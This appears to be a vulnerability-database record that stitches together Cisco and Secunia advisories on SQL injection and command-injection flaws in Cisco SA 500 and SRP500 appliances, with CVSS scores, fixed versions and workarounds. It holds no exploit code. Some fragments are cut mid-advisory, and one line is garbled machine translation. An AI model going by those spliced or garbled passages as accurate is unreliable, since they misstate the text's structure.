If the information is not clear, please contact the Cisco Small
Business Support Center or your contracted maintenance provider for
assistance. Small Business Support Center contacts are as follows.
+1 866 606 1866 (toll free from within North America)
+1 408 418 1866 (toll call from anywhere in the world)
Customers should have their product serial number available.
Refer to
http://www.cisco.com/en/US/support/tsd_cisco_small_business_support_center_contacts.html
for additional support contact information, including
localized telephone numbers, and instructions and e-mail addresses for
use in various languages.
Customers with Service Contracts
+-------------------------------
See the Obtaining Fixed Software section of this advisory.
Customers using Third Party Support Organizations
+------------------------------------------------
See the Obtaining Fixed Software section of this advisory.
Customers without Service Contracts
+----------------------------------
See the Obtaining Fixed Software section of this advisory.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any malicious use of the
vulnerability described in this advisory. This vulnerability was
demonstrated at a conference in San Jose, CA on November 2, 2011.
This vulnerability was reported to Cisco by Michal Sajdak of
Securitum, Poland.
Status of this Notice: Final
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111102-srp500
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+------------------------------------------------------------+
| Revision 1.0 | 2011-November-2 | Initial draft release. |
+------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities
in Cisco products, obtaining assistance with security
incidents, and registering to receive security information
from Cisco, is available on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding
Cisco security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAk6wn+cACgkQQXnnBKKRMNAY5wD8CplHH8zrwzTGPHmrOFJyeYIm
kg/OjEjxe60spU5+IbcA/3gNeptZTKm+fZ/lVJOIfB3RK2Gya7J0tDtnSA7Hna/j
=XkML
-----END PGP SIGNATURE-----
| VAR-201107-0139 | CVE-2011-2546 | Cisco SA 500 series security appliances In SQL Injection vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
SQL injection vulnerability in the web-based management interface on Cisco SA 500 series security appliances with software before 2.1.19 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, aka Bug ID CSCtq65669. The problem is Bug ID CSCtq65669 It is a problem.By any third party SQL The command may be executed.
Exploiting this issue could allow an authenticated attacker to compromise the affected device, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue is being tracked by Cisco Bug ID CSCtq65669.
The following devices are affected:
Cisco SA520
Cisco SA520W
Cisco SA540. Both vulnerabilities can be exploited over the
network.
Cisco has released free software updates that address these
vulnerabilities.
Workarounds that mitigate these vulnerabilities are available.
This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20110720-sa500.shtml
Affected Products
=================
Vulnerable Products
+------------------
These vulnerabilities affect the following devices running a software
version prior to the first fixed release documented in the Software
Versions and Fixes section of this advisory:
* Cisco SA520
* Cisco SA520W
* Cisco SA540
There are multiple methods to determine the version of system
software that is running on a device. At the device web login screen,
the system software version is displayed under the "Security
Appliance Configuration Utility" heading. Administrators can also log
in to a device through the web management interface and navigate to
Administration > Firmware & Configuration > Network. The Primary
Firmware field appears below Status Information. The number directly
beside the Primary Firmware field is the system software version.
Alternately, after logging in to the device, administrators can click
on the About link on top right side of the screen. The system
software version will be displayed below the "Security Appliance
Configuration Utility" heading. An example of the system firmware
version is 2.1.18.
Products Confirmed Not Vulnerable
+---------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
This vulnerability is documented in Cisco bug ID CSCtq65669 and
has been assigned Common Vulnerabilities and Exposures (CVE)
ID CVE-2011-2546
* Privilege Escalation Vulnerability
An authenticated user who is logged in to an affected device
could exploit this vulnerability to inject arbitrary commands
into the underlying operating system. By supplying malicious
parameters through several web forms, the attacker could gain
root privileges.
This vulnerability is documented in Cisco bug ID CSCtq65681 and
has been assigned Common Vulnerabilities and Exposures (CVE)
ID CVE-2011-2547
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCtq65669 - SQL injection vulnerability
CVSS Base Score - 5.0
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Partial
Integrity Impact - None
Availability Impact - None
CVSS Temporal Score - 4.1
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtq65681 - Privilege escalation vulnerability
CVSS Base Score - 9.0
Access Vector - Network
Access Complexity - Low
Authentication - Single
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the SQL injection vulnerability could
allow the retrieval of usernames and passwords. An authenticated user
could exploit the privilege escalation vulnerability to execute
underlying operating system commands.
Software Versions and Fixes
===========================
When considering software upgrades, also consult:
http://www.cisco.com/go/psirt
And any subsequent advisories to determine exposure and a
complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Small Business Support Center or your contracted
maintenance provider for assistance.
These vulnerabilities have been corrected in software versions 2.1.19
and later.
If administrators of SA 500 Series Security Appliances have
configured the Check for New Firmware notification under
Administration > Firmware & Configuration > Network, a message
regarding new firmware that is available on Cisco.com will be
displayed at the next log in to the appliance.
Note: the SA 500 will not perform an automatic upgrade to
version 2.1.19. The upgrade must be performed by an administrator.
The latest software for SA 500 Series Security Appliances can be
downloaded at:
http://www.cisco.com/cisco/software/navigator.html?mdfid=282414017
Workarounds
===========
The following mitigations help limit the exposure to these
vulnerabilities.
* Disable Remote Management
Caution: Do not disable remote management if administrators
manage devices via the WAN connection. This action will result in
a loss of management connectivity to the device. Several features
also require remote management to be enabled, including SSL VPN
access and the Cisco Quick Virtual Private Network (QVPN)
Utility.
Remote Management is disabled by default. Administrators can
disable this feature by choosing Network Management > Remote
Management. Change the setting for this field to Disabled.
Disabling remote management limits exposure because the
vulnerabilities can then be exploited from the inter-LAN network
only.
Disabling remote management limits the exposure as the
vulnerabilities can then only be exploited from the inter LAN
network.
* Limit Remote Management Access to Specific IP Addresses
If remote management is required, secure the device so that it
can be accessed by certain IP addresses only, rather than the
default setting of All IP Addresses. After choosing Network
Management > Remote Management, an administrator can change the
Remote IP Address field to ensure that only devices with
specified IP addresses can access the device.
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html
Or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers should obtain upgraded software through their regular
update channels. For most customers, this means that upgrades should
be obtained through the Software Center on Cisco's worldwide website
at http://www.cisco.com
If the information is not clear, please contact the Cisco Small
Business Support Center or your contracted maintenance provider for
assistance. Small Business Support Center contacts are as follows.
+1 866 606 1866 (toll free from within North America)
+1 408 418 1866 (toll call from anywhere in the world)
Customers should have their product serial number available.
Refer to:
http://www.cisco.com/en/US/support/tsd_cisco_small_business_support_center_contacts.html
for additional support contact information, including localized
telephone numbers, and instructions and e-mail addresses for use in
various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities that are described in this advisory.
These vulnerabilities were reported to Cisco by Michal Sajdak of
Securitum, Poland.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20110720-sa500.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+-------------------------------------------------------------------+
| Revision 1.0 | 2011-July-20 | Initial public release. |
+-------------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at:
http://www.cisco.com/go/psirt
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (Darwin)
iF4EAREIAAYFAk4m4k8ACgkQQXnnBKKRMNDzJgD+MwAQlnCeOSxzAq20X7iFbKvP
tRwD9b1YmA4CFNcFLJkA/i25Tf/onaCHv4x79F0XDt2ZaCSpdEIp17oYfzFajYXl
=aaaj
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
The Secunia Vulnerability Intelligence Manager (VIM) enables you to handle vulnerability threats in a simple, cost effective way.
Read more and request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Cisco SA 500 Series Web Management Interface Two Vulnerabilities
SECUNIA ADVISORY ID:
SA45355
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45355/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45355
RELEASE DATE:
2011-07-22
DISCUSS ADVISORY:
http://secunia.com/advisories/45355/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45355/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45355
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in Cisco SA 500 Series
Security Appliances, which can be exploited by malicious users to
compromise a vulnerable system and by malicious people to conduct SQL
injection attacks.
1) Certain input passed to the login form is not properly sanitised
before being used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.
2) Certain unspecified input passed to the web management interface
is not properly sanitised before being used. This can be exploited to
inject and execute arbitrary shell commands.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits Michal Sajdak, Securitum.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20110720-sa500.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------